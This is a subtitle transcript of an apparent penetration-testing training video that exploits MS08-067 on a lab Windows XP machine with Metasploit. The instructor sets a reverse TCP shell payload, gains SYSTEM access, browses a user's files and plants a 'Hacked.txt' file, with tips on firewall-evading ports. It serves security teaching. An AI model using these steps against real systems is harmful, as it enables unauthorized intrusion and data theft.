1 1 00:00:01,384 --> 00:00:02,217 So, now that we've gone through 2 2 00:00:02,217 --> 00:00:04,634 our reconnaissance, our scanning and enumeration, 3 3 00:00:04,634 --> 00:00:07,678 we're ready to try to throw an attack and gain access. 4 4 00:00:07,678 --> 00:00:09,252 Based on our scanning and enumeration, 5 5 00:00:09,252 --> 00:00:11,487 we've identified a vulnerability to attack. 6 6 00:00:11,487 --> 00:00:13,642 In our case, it's gonna be our Windows machine 7 7 00:00:13,642 --> 00:00:16,734 with Microsoft 08-067 vulnerability. 8 8 00:00:16,734 --> 00:00:19,127 So, let's launch our Kali machine. 9 9 00:00:19,127 --> 00:00:20,054 We still have all the machines up 10 10 00:00:20,054 --> 00:00:23,441 and running from our previous lab. 11 11 00:00:23,441 --> 00:00:24,345 So, from our Kali prompt, 12 12 00:00:24,345 --> 00:00:26,751 we're gonna start the Metaspolit Framework, 13 13 00:00:26,751 --> 00:00:28,418 which is msfconsole. 14 14 00:00:32,677 --> 00:00:33,615 Now, from the Metasploit Framework, 15 15 00:00:33,615 --> 00:00:35,319 we're gonna be able to configure our exploit 16 16 00:00:35,319 --> 00:00:37,359 and our payload that we want to send over. 17 17 00:00:37,359 --> 00:00:39,617 So as you can see here, there's over 1,500 exploits, 18 18 00:00:39,617 --> 00:00:41,017 over 400 payloads, so we need 19 19 00:00:41,017 --> 00:00:42,582 to figure out which one we want to use. 20 20 00:00:42,582 --> 00:00:44,563 Now, based on our reconnaissance 21 21 00:00:44,563 --> 00:00:46,082 and our scanning and enumeration, 22 22 00:00:46,082 --> 00:00:50,074 we're gonna use the ms08_067 vulnerability. 23 23 00:00:50,074 --> 00:00:52,113 Now, this vulnerability goes against 24 24 00:00:52,113 --> 00:00:55,292 Windows XP and Windows 2000 servers, 25 25 00:00:55,292 --> 00:00:56,983 and these will actually go against 26 26 00:00:56,983 --> 00:00:58,357 the file sharing capability, 27 27 00:00:58,357 --> 00:01:01,141 and we know that they were running file sharing on port 445. 28 28 00:01:01,141 --> 00:01:03,461 So, when I search for that, you'll find it right here. 29 29 00:01:03,461 --> 00:01:06,445 It's in the exploit/windows/smb directory, 30 30 00:01:06,445 --> 00:01:08,945 and it is the ms08_067_netapi. 31 31 00:01:09,809 --> 00:01:10,695 I'm gonna copy that so I don't have 32 32 00:01:10,695 --> 00:01:13,890 to type it out each time, and I'm just gonna type in use, 33 33 00:01:13,890 --> 00:01:16,828 and then paste it in and hit enter. 34 34 00:01:16,828 --> 00:01:19,304 The second thing I need to do is set my payload. 35 35 00:01:19,304 --> 00:01:21,115 Now, the payload is, once we've broke down the door 36 36 00:01:21,115 --> 00:01:23,842 with the exploit, what code do we want them to run? 37 37 00:01:23,842 --> 00:01:25,960 In our case, we want them to run 38 38 00:01:25,960 --> 00:01:30,127 the windows/shell/reverse_tcp. 39 39 00:01:36,698 --> 00:01:38,255 Now, that payload is set. 40 40 00:01:38,255 --> 00:01:39,641 So now, we have a couple more options. 41 41 00:01:39,641 --> 00:01:42,065 We're gonna do show options, 42 42 00:01:42,065 --> 00:01:44,694 and you'll see here that we need a remote host, 43 43 00:01:44,694 --> 00:01:46,752 which is the target we're going after, 44 44 00:01:46,752 --> 00:01:49,270 and a listening host, is the listening we're gonna do, 45 45 00:01:49,270 --> 00:01:51,385 which in our case, is gonna be the Kali machine. 46 46 00:01:51,385 --> 00:01:53,442 So, we're gonna do set RHOST 47 47 00:01:53,442 --> 00:01:55,348 to the IP of the Windows machine, 48 48 00:01:55,348 --> 00:01:57,431 which was 192.168.56.100. 49 49 00:02:00,257 --> 00:02:02,356 Then we need to set our listening host 50 50 00:02:02,356 --> 00:02:04,269 to our IP for our Kali machine, 51 51 00:02:04,269 --> 00:02:06,352 which was 192.168.56.102, 52 52 00:02:09,243 --> 00:02:10,167 and now we can show our options 53 53 00:02:10,167 --> 00:02:13,418 to verify those options took, and you can see they did. 54 54 00:02:13,418 --> 00:02:14,920 There is our Windows machine IP, 55 55 00:02:14,920 --> 00:02:17,314 and there is our listening host for our Kali machine. 56 56 00:02:17,314 --> 00:02:19,079 Now, the reason why we're allowed to set 57 57 00:02:19,079 --> 00:02:21,162 this listening host is because in an exploit, 58 58 00:02:21,162 --> 00:02:23,639 I may be the one who is setting the exploits, 59 59 00:02:23,639 --> 00:02:27,509 but I don't want to do all the post-exploit exploitation, 60 60 00:02:27,509 --> 00:02:28,888 and I'll allow my friend to do that. 61 61 00:02:28,888 --> 00:02:30,352 So, for instance, if there was two of us 62 62 00:02:30,352 --> 00:02:34,107 in this room, I might be one 102, he might be 103. 63 63 00:02:34,107 --> 00:02:36,342 I'll throw the exploit, the answer that comes back 64 64 00:02:36,342 --> 00:02:38,399 will be to his machine so he can then do 65 65 00:02:38,399 --> 00:02:40,480 all the information gathering, and that way, 66 66 00:02:40,480 --> 00:02:42,110 I might be the guy who breaks down the door, 67 67 00:02:42,110 --> 00:02:44,899 and I have a team of guys who take the information out. 68 68 00:02:44,899 --> 00:02:46,219 The other thing you want to note, here, 69 69 00:02:46,219 --> 00:02:49,626 is this listening port, which is currently set to 4444. 70 70 00:02:49,626 --> 00:02:51,741 That's the default for Metasploit. 71 71 00:02:51,741 --> 00:02:53,776 It doesn't have to be 4444, though. 72 72 00:02:53,776 --> 00:02:57,242 You can set it to A, or 443, or any other port you need 73 73 00:02:57,242 --> 00:03:00,751 to help you get through and back through a firewall. 74 74 00:03:00,751 --> 00:03:02,659 Now that we've set up all of our configurations, 75 75 00:03:02,659 --> 00:03:03,953 all we have to do to run this exploit 76 76 00:03:03,953 --> 00:03:06,036 is type the word exploit. 77 77 00:03:08,588 --> 00:03:09,764 And you can see that we've started 78 78 00:03:09,764 --> 00:03:11,887 the reverse handler on our Kali machine, 79 79 00:03:11,887 --> 00:03:15,863 which is our Kali machine listening on port 4444. 80 80 00:03:15,863 --> 00:03:18,961 It then goes out and sends the exploit on port 445, 81 81 00:03:18,961 --> 00:03:21,099 which was the vulnerability we were trying to trigger, 82 82 00:03:21,099 --> 00:03:22,328 to the Windows machine. 83 83 00:03:22,328 --> 00:03:23,452 It detected that that was 84 84 00:03:23,452 --> 00:03:25,649 a Service Pack 3 Windows XP machine, 85 85 00:03:25,649 --> 00:03:28,853 and based on that, it threw the appropriate vulnerability 86 86 00:03:28,853 --> 00:03:31,731 and the appropriate exploit for that vulnerability. 87 87 00:03:31,731 --> 00:03:35,802 It then sent an encoded stage dropper over to that machine, 88 88 00:03:35,802 --> 00:03:38,526 and that encoded stage was then received, 89 89 00:03:38,526 --> 00:03:40,488 broke in, used the Command Shell, 90 90 00:03:40,488 --> 00:03:43,180 and sent it back to me, and so now I can see that. 91 91 00:03:43,180 --> 00:03:45,764 That it went from my Kali machine 92 92 00:03:45,764 --> 00:03:47,139 to the Windows machine, and that is 93 93 00:03:47,139 --> 00:03:49,539 the connection that we have open right now. 94 94 00:03:49,539 --> 00:03:51,505 And, notice where we are. 95 95 00:03:51,505 --> 00:03:53,869 We're in the system 32 directory in Windows. 96 96 00:03:53,869 --> 00:03:54,923 We have now been dropped 97 97 00:03:54,923 --> 00:03:57,017 in to the command prompt of Windows, 98 98 00:03:57,017 --> 00:03:59,932 and we are there as a system level user. 99 99 00:03:59,932 --> 00:04:01,858 So, we have the ability to create files, 100 100 00:04:01,858 --> 00:04:05,096 edit files, delete files, or run any other commands 101 101 00:04:05,096 --> 00:04:07,318 that we would using the command prompt 102 102 00:04:07,318 --> 00:04:09,430 as if we were there locally on the machine. 103 103 00:04:09,430 --> 00:04:11,121 So, what we're gonna do here, 104 104 00:04:11,121 --> 00:04:12,915 is we're gonna start gathering some information. 105 105 00:04:12,915 --> 00:04:13,748 So, why don't we start 106 106 00:04:13,748 --> 00:04:16,998 with something like system information. 107 107 00:04:20,505 --> 00:04:22,334 And what we can see here 108 108 00:04:22,334 --> 00:04:24,648 is a bunch of information about this machine. 109 109 00:04:24,648 --> 00:04:26,506 We can see the exact version it is, 110 110 00:04:26,506 --> 00:04:28,179 we can see what kind of machine it is, 111 111 00:04:28,179 --> 00:04:30,455 is it part of a domain or just a workstation. 112 112 00:04:30,455 --> 00:04:32,173 This is important to know because if I broke 113 113 00:04:32,173 --> 00:04:34,368 in to a machine that was part of a domain, 114 114 00:04:34,368 --> 00:04:35,848 I would then try to go from gaining system 115 115 00:04:35,848 --> 00:04:39,012 on this particular machine to being a domain admin, 116 116 00:04:39,012 --> 00:04:41,300 and continue to elevate my privileges. 117 117 00:04:41,300 --> 00:04:43,192 I can see information such as the proc ID, 118 118 00:04:43,192 --> 00:04:44,557 the date and time it was installed, 119 119 00:04:44,557 --> 00:04:47,983 how long it's been up, how many processors it has, 120 120 00:04:47,983 --> 00:04:50,357 how much memory it has, how much hard disk it has, 121 121 00:04:50,357 --> 00:04:53,513 all sorts of information that could be useful to me. 122 122 00:04:53,513 --> 00:04:54,551 The other thing I can see here 123 123 00:04:54,551 --> 00:04:56,388 is everything that it's been patched for. 124 124 00:04:56,388 --> 00:04:57,813 In this case, the only patch it has 125 125 00:04:57,813 --> 00:05:00,813 is this one particular one, Q147222, 126 126 00:05:02,191 --> 00:05:04,004 which means that it's Service Pack 3. 127 127 00:05:04,004 --> 00:05:05,916 None of the other updates have been had, 128 128 00:05:05,916 --> 00:05:07,829 so this means that there's a lot of vulnerabilities 129 129 00:05:07,829 --> 00:05:10,255 on this box that I can then go and attack, 130 130 00:05:10,255 --> 00:05:12,710 which is good for us as a training opportunity, 131 131 00:05:12,710 --> 00:05:14,197 but if I was the one who owned this box, 132 132 00:05:14,197 --> 00:05:15,980 I would know, "Hey, there's a lot of things 133 133 00:05:15,980 --> 00:05:18,410 "that I gotta do to get this up to shape." 134 134 00:05:18,410 --> 00:05:19,626 So, what are some other things we can do? 135 135 00:05:19,626 --> 00:05:21,740 Well, let's go ahead and look around this drive. 136 136 00:05:21,740 --> 00:05:23,596 Let's go to the C drive. 137 137 00:05:23,596 --> 00:05:26,667 We'll go to the main root directory of the C drive, 138 138 00:05:26,667 --> 00:05:29,052 and we'll see what's there. 139 139 00:05:29,052 --> 00:05:31,212 Right now, it just looks like a basic Windows machine. 140 140 00:05:31,212 --> 00:05:36,024 We can even go in to their documents and settings 141 141 00:05:36,024 --> 00:05:38,566 and see if there's anything there. 142 142 00:05:38,566 --> 00:05:42,399 In this case, we see there's a user, John Sim. 143 143 00:06:02,874 --> 00:06:03,707 And you can see that we're able 144 144 00:06:03,707 --> 00:06:06,213 to access John's information, 145 145 00:06:06,213 --> 00:06:08,701 because again, we're a system level user. 146 146 00:06:08,701 --> 00:06:10,543 Now, he doesn't happen to have anything on there. Why? 147 147 00:06:10,543 --> 00:06:12,161 Because when we set this box up, 148 148 00:06:12,161 --> 00:06:13,526 we didn't put anything there for us to find. 149 149 00:06:13,526 --> 00:06:16,322 We just set up a basic default blank account, 150 150 00:06:16,322 --> 00:06:18,170 but we can now start writing things to John. 151 151 00:06:18,170 --> 00:06:20,642 For instance, we might do something like this. 152 152 00:06:20,642 --> 00:06:21,475 Echo 153 153 00:06:23,311 --> 00:06:24,144 "Hi, John, 154 154 00:06:26,280 --> 00:06:28,280 "I hacked your machine!" 155 155 00:06:32,338 --> 00:06:33,198 and then we're gonna pipe that over 156 156 00:06:33,198 --> 00:06:36,781 to a file called Hacked.txt, and hit enter. 157 157 00:06:38,052 --> 00:06:39,626 So, now that file should be sitting there 158 158 00:06:39,626 --> 00:06:41,914 on the Desktop, which we can see it is. 159 159 00:06:41,914 --> 00:06:43,551 Now, if that file was there before, 160 160 00:06:43,551 --> 00:06:45,365 we would be able to see it by typing 161 161 00:06:45,365 --> 00:06:47,025 that file to the screen. 162 162 00:06:47,025 --> 00:06:50,900 So, in our case, we would type Hacked.txt, 163 163 00:06:50,900 --> 00:06:52,840 and we could see what the contents in that file are. 164 164 00:06:52,840 --> 00:06:55,012 Now, if we're John on our machine, 165 165 00:06:55,012 --> 00:06:56,892 what do we think we're gonna see? 166 166 00:06:56,892 --> 00:07:00,640 Well, on his desktop now, we have a hacked file, 167 167 00:07:00,640 --> 00:07:02,195 and we can see that, and that is just proof 168 168 00:07:02,195 --> 00:07:03,989 that we were able to break in to his machine. 169 169 00:07:03,989 --> 00:07:05,897 Now, if he had a bunch of information on here, 170 170 00:07:05,897 --> 00:07:07,956 we'd be able to steal that information as well, 171 171 00:07:07,956 --> 00:07:12,123 but in this case, in this machine there wasn't much there. 172 172 00:07:13,873 --> 00:07:15,419 So, once we're done with that machine, 173 173 00:07:15,419 --> 00:07:17,844 we would just type exit to get out of the command prompt, 174 174 00:07:17,844 --> 00:07:19,196 and that will actually break the connection 175 175 00:07:19,196 --> 00:07:21,430 between us and that machine, as well. 176 176 00:07:21,430 --> 00:07:23,009 And then hit control C. 177 177 00:07:23,009 --> 00:07:25,531 Abort the session? Yes. 178 178 00:07:25,531 --> 00:07:26,963 And that's the basics of how to hack 179 179 00:07:26,963 --> 00:07:31,130 in to a Windows box using the ms_08_067 vulnerability.